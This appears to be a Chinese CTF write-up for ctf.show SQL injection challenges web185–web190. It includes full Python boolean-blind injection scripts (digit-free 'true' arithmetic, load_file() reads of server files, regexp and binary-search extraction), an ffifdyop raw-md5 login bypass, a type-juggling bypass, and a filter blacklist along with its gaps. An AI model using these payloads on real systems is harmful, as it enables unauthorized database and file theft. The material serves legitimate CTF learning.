web185
这道题还有另外一个脚本：利用 MySQL 里 true 求值为 1 的特性（相加得到数字，concat 得到数字串），在 payload 不能直接出现数字时把需要的数字拼出来。
concat(true+true) 得到 '2'，concat(true) 得到 '1'（true+true 先按数值相加，再转成字符串）
concat(true, true) 得到 '11'（两个参数按字符串拼接，不是相加）
然后上脚本(Y4tacker这个师傅的)
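# @Author:Y4tacker
url = "http://341e93e1-a1e7-446a-b7fc-75beb0e88086.chall.ctf.show/select-waf.php"

# Known flag prefix; positions 1..5 of b.pass are therefore never probed.
PREFIX = 'flag{'

# Candidate characters for the rest of the flag. The body is a UUID
# (8-4-4-4-12 hex groups, see the note below the script) plus the closing
# brace, so hex digits, '-' and '}' are enough. The original scanned
# chr(0..126) and only skipped '.', but other regex metacharacters such as
# '^' and '$' can also match a one-character haystack whatever its real
# value, which is the likely source of the stray characters in its output.
CANDIDATES = "0123456789abcdef-}"

# Marker observed in the response when the join condition held; presumably the
# page prints the row count of the injected right join.
MATCH_MARKER = "$user_count = 43;"


def createNum(n):
    """Return a digit-free SQL expression that evaluates to the integer n.

    MySQL evaluates ``true`` as 1, so ``n`` copies joined with ``+`` give n.
    Raises ValueError for n < 1, which cannot be expressed this way (the
    original silently returned 'true', i.e. 1, for n == 0).
    """
    if n < 1:
        raise ValueError("createNum needs n >= 1, got %r" % (n,))
    return "+".join(["true"] * n)


def build_table_name(position, char):
    """Return the tableName payload asking whether byte ``position`` of b.pass is ``char``.

    ``position`` is 1-based (substr semantics). Numbers are spelled with
    createNum() and the probe character goes through char(), so the payload
    contains neither digits nor quotes.
    """
    return (
        "ctfshow_user as a right join ctfshow_user as b on "
        f"(substr(b.pass,{createNum(position)},{createNum(1)})"
        f"regexp(char({createNum(ord(char))})))"
    )


def main():
    # Deferred import: the payload helpers above stay importable without requests.
    import requests

    flag = PREFIX
    for position in range(len(PREFIX) + 1, 45):
        for candidate in CANDIDATES:
            data = {"tableName": build_table_name(position, candidate)}
            r = requests.post(url, data=data, timeout=10)
            if r.text.find(MATCH_MARKER) > 0:
                flag += candidate
                break
        else:
            # No candidate matched: keep the alignment and move on.
            flag += "?"
        print(flag)
        if flag.endswith("}"):
            return
    print(flag)


if __name__ == "__main__":
    main()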
脚本输出里可能夹杂误判的字符：regexp 的元字符（如 ^、$，脚本只跳过了 .）可能匹配任意单个字符。flag 主体是 8-4-4-4-12 形式的 UUID，对照输出自己把 flag 写出来。
web186
与上题相同
web187
$username = $_POST['username'];
// md5(..., true) returns the 16 raw digest bytes, not the 32-char hex string.
// Presumably the raw bytes are concatenated into the SQL query unescaped
// (the query itself is not shown here); that is what the ffifdyop trick relies on.
$password = md5($_POST['password'],true);
// only admin can get the flag
if($username!='admin'){$ret['msg']='用户名不存在';die(json_encode($ret));}
这道题密码经过 md5() 处理，而且第二个参数是 true：此时返回的是 16 字节的原始二进制摘要，而不是 32 位十六进制字符串。
去查了一下 ffifdyop：它的 md5 原始字节以 'or'6 开头，拼进 SQL 后密码条件变成 password='' or '6…'，MySQL 把 '6…' 转成非 0 数字当作真，整个条件恒真，类似于一个万能密码，就可以绕过。
登录成功但是页面没有回显，用抓包工具看返回的响应。
web188
这题用正则过滤了上面那些东西，并且 password 只能是数字而且是整数。
SQL 弱类型隐式转换：MySQL 把字符串和整数比较时会先把字符串转成数字，'admin' 转成 0，所以 username=0 能匹配到 admin；同理，若存储的密码不是以数字开头的字符串，password=0 也能比较相等，就可以直接绕过了。
web189
flag在api/index.php文件中
这是题目的提示
// Username blacklist, case-insensitive. Blocked: the keywords select, and,
// or, into, from, where, join, sleep, benchmark; the space and its usual
// substitutes (\x09 tab, \x0a LF, \x0b VT, \x0c FF, \x0d CR, \xa0 NBSP,
// \x00 NUL); and '*', '&' (\x26), '|' (\x7c). The match is a plain substring
// test, so "or" also rejects e.g. information_schema.
// Not on the list, and relied on by the scripts below: if(), substr(),
// load_file(), regexp, parentheses, quotes, '=' and ','.
if(preg_match('/select|and| |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\x26|\x7c|or|into|from|where|join|sleep|benchmark/i', $username)){$ret['msg']='用户名非法';die(json_encode($ret));}
过滤了这些东西
思路是用 load_file() 读出 api/index.php，先找一个能区分真假的回显：返回"查询失败"表示没有查到用户（username 错误）；返回"密码错误"说明 username 已经匹配到用户，这就是可以利用的回显。结果是 username=0 时（'admin' 隐式转换成 0 与之相等）有"密码错误"的回显。
用脚本进行布尔盲注
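import time

url = "http://dc02940d-e22b-4796-ab0f-04bdf57d3a9f.challenge.ctf.show/api/"

# Candidate characters, tried in this order for every position. The original
# list also contained ' ' and "'", but neither can ever be confirmed: a space
# in the username is rejected by the preg_match filter, and a bare quote
# breaks the string literal in the payload. They only cost a request each.
flagstr = "}{<>$=,;_abcdefghijklmnopqr-stuvwxyz0123456789"

# Byte offset of the flag inside api/index.php (1-based, substr semantics) and
# how many bytes to leak from there. The offset was found by hand by the group
# owner after a very long run.
FLAG_OFFSET = 257
FLAG_MAX_LEN = 60

# "8d25" is the last \uXXXX escape of the JSON-encoded "查询失败" message,
# i.e. the page returned when the injected username evaluates to 1 (no such
# user).
NO_USER_MARKER = "8d25"


def build_username(offset, char):
    """Return the username payload asking whether byte ``offset`` of api/index.php is ``char``.

    The comparison is wrapped in if(..., 1, 0): on a match the username becomes
    1 (matches no user, "查询失败"), otherwise 0 (matches admin through MySQL's
    string-to-number cast, "密码错误"). ``offset`` is 1-based.
    """
    return "if(substr(load_file('/var/www/html/api/index.php'),{},1)=('{}'),1,0)".format(offset, char)


def leak_char(is_char_at, offset, alphabet=flagstr):
    """Return the first character of ``alphabet`` for which ``is_char_at(offset, ch)`` is true, else None."""
    for ch in alphabet:
        if is_char_at(offset, ch):
            return ch
    return None


def main():
    # Deferred import: keeps the helpers importable (and testable) without requests.
    import requests

    def is_char_at(offset, ch):
        data = {"username": build_username(offset, ch), "password": "0"}
        response = requests.post(url, data=data, timeout=10)
        time.sleep(0.3)  # the original paced requests; stay gentle on the shared instance
        return response.text.find(NO_USER_MARKER) > 0

    flag = ""
    for offset in range(FLAG_OFFSET, FLAG_OFFSET + FLAG_MAX_LEN):
        ch = leak_char(is_char_at, offset)
        if ch is None:
            # Nothing matched (character outside flagstr): keep the alignment
            # instead of silently dropping the position like the original did.
            ch = "?"
        flag += ch
        print(flag)
        if ch == "}":
            break
    print(flag)


if __name__ == "__main__":
    main()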
就是跑得有点慢：每个位置要在几十个候选字符里逐个比较，每个字符一次请求，而且每次请求后还 sleep 0.3 秒。
username 在 SQL 里没有加引号（整个值直接拼进查询），所以可以直接把 if() 或 case 表达式当作 username 注入。
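# @Author:Kradress
from operator import concat
import string

url = 'http://2e697a15-84fe-4c2d-988f-37edb5260613.challenge.ctf.show/api/'

# Candidate characters: the flag body is a UUID plus the closing brace.
uuid = string.digits + string.ascii_lowercase + "-}"

# Known prefix; the REGEXP pattern grows by one character per confirmed hit.
PREFIX = 'ctfshow{'

# JSON-escaped "密码错误": the password check ran, i.e. the username resolved
# to 0 and matched admin through MySQL's string-to-number cast.
WRONG_PASSWORD_MARKER = "\\u5bc6\\u7801\\u9519\\u8bef"


def build_username(known, char):
    """Return the username payload asking whether api/index.php contains ``known + char``.

    load_file(...) REGEXP '<known><char>' is wrapped in if(..., 0, 1): a match
    yields username 0 (admin, "密码错误"), a miss yields 1 (no such user).
    NOTE(review): the '{' in the prefix is a regex metacharacter; the write-up
    reports the script working as-is, but escape it if the target's regex
    engine rejects an unbalanced brace.
    """
    return f"if(load_file('/var/www/html/api/index.php')regexp('{known}{char}'),0,1)"


def next_char(matches, known, alphabet=uuid):
    """Return the first ``ch`` in ``alphabet`` for which ``matches(known, ch)`` is true, else None."""
    for ch in alphabet:
        if matches(known, ch):
            return ch
    return None


def main():
    # Deferred import: the payload helpers stay importable without requests.
    import requests

    def matches(known, ch):
        data = {'username': build_username(known, ch), 'password': 0}
        res = requests.post(url, data=data, timeout=10)
        return WRONG_PASSWORD_MARKER in res.text

    known = PREFIX
    # 40 rounds cover the 36-character UUID body plus the closing brace.
    for _ in range(40):
        ch = next_char(matches, known)
        if ch is None:
            # The original kept retrying the same prefix; nothing would change.
            print("no candidate matched after %r" % known)
            break
        known += ch
        print(known)
        if ch == "}":
            break
    print(known)


if __name__ == "__main__":
    main()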
这个脚本快得多：用 regexp 做前缀匹配，每个位置最多只需试 38 个候选字符（0-9、a-z、- 和 }），而且没有 sleep。
web190
这题 username 在 SQL 里带引号了（所以 payload 用 admin' 闭合引号、用 # 注释掉后面），但"密码错误"/"查询失败"的返回和上题一样，先确认回显，再用二分法盲注。
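import sys
import time

url = "http://36e8713a-b1fb-49c2-badb-4c4d66f5d1cb.challenge.ctf.show/api/"

# "8bef" is the last \uXXXX escape of the JSON-encoded "密码错误": the
# injected condition held, the admin row was selected and only the password
# check failed. Any other page means the condition was false.
TRUE_MARKER = "8bef"

# Earlier stages of the same blind injection, kept for reference (swap the
# subquery into TARGET to repeat them):
#   (select database())                                    -> ctfshow_web
#   (select group_concat(table_name) from information_schema.tables
#      where table_schema=database())                      -> ctfshow_fl0g
#   (select group_concat(column_name) from information_schema.columns
#      where table_name='ctfshow_fl0g')                    -> id,f1ag
TARGET = "(select f1ag from ctfshow_fl0g)"


def build_payload(position, threshold):
    """Return the username payload testing ascii(byte ``position`` of TARGET) < ``threshold``.

    username is quoted in the query, so the payload closes the quote after
    ``admin`` and comments out the rest with ``#``. ``position`` is 1-based.
    """
    return "admin'and (ascii(substr({},{},1))<{})#".format(TARGET, position, threshold)


def bisect_char(is_less_than, position, lo=0, hi=127):
    """Binary-search the byte at ``position`` and return its code.

    ``is_less_than(position, n)`` must answer whether the byte's code is < n.
    The search assumes ``lo <= code < hi`` and needs ceil(log2(hi - lo))
    oracle calls. ``lo`` defaults to 0 (the original used 32) so that the
    ascii('') = 0 returned past the end of the value comes back as 0 instead
    of being reported as a space; for 0..127 that is still seven calls.
    """
    while hi - lo > 1:
        mid = (lo + hi) >> 1
        if is_less_than(position, mid):
            hi = mid
        else:
            lo = mid
    return lo


def main():
    # Deferred import: the search helpers stay importable without requests.
    import requests

    def is_less_than(position, n):
        data = {"username": build_payload(position, n), "password": 0}
        res = requests.post(url=url, data=data, timeout=10)
        time.sleep(0.3)
        return res.text.find(TRUE_MARKER) > 0

    flag = ""
    for position in range(1, 60):
        code = bisect_char(is_less_than, position)
        if code == 0:
            # substr() past the end returns '' and ascii('') is 0: done. The
            # original had no stop and padded the flag with spaces up to 59 chars.
            break
        flag += chr(code)
        print(flag)
    print(flag)


if __name__ == "__main__":
    main()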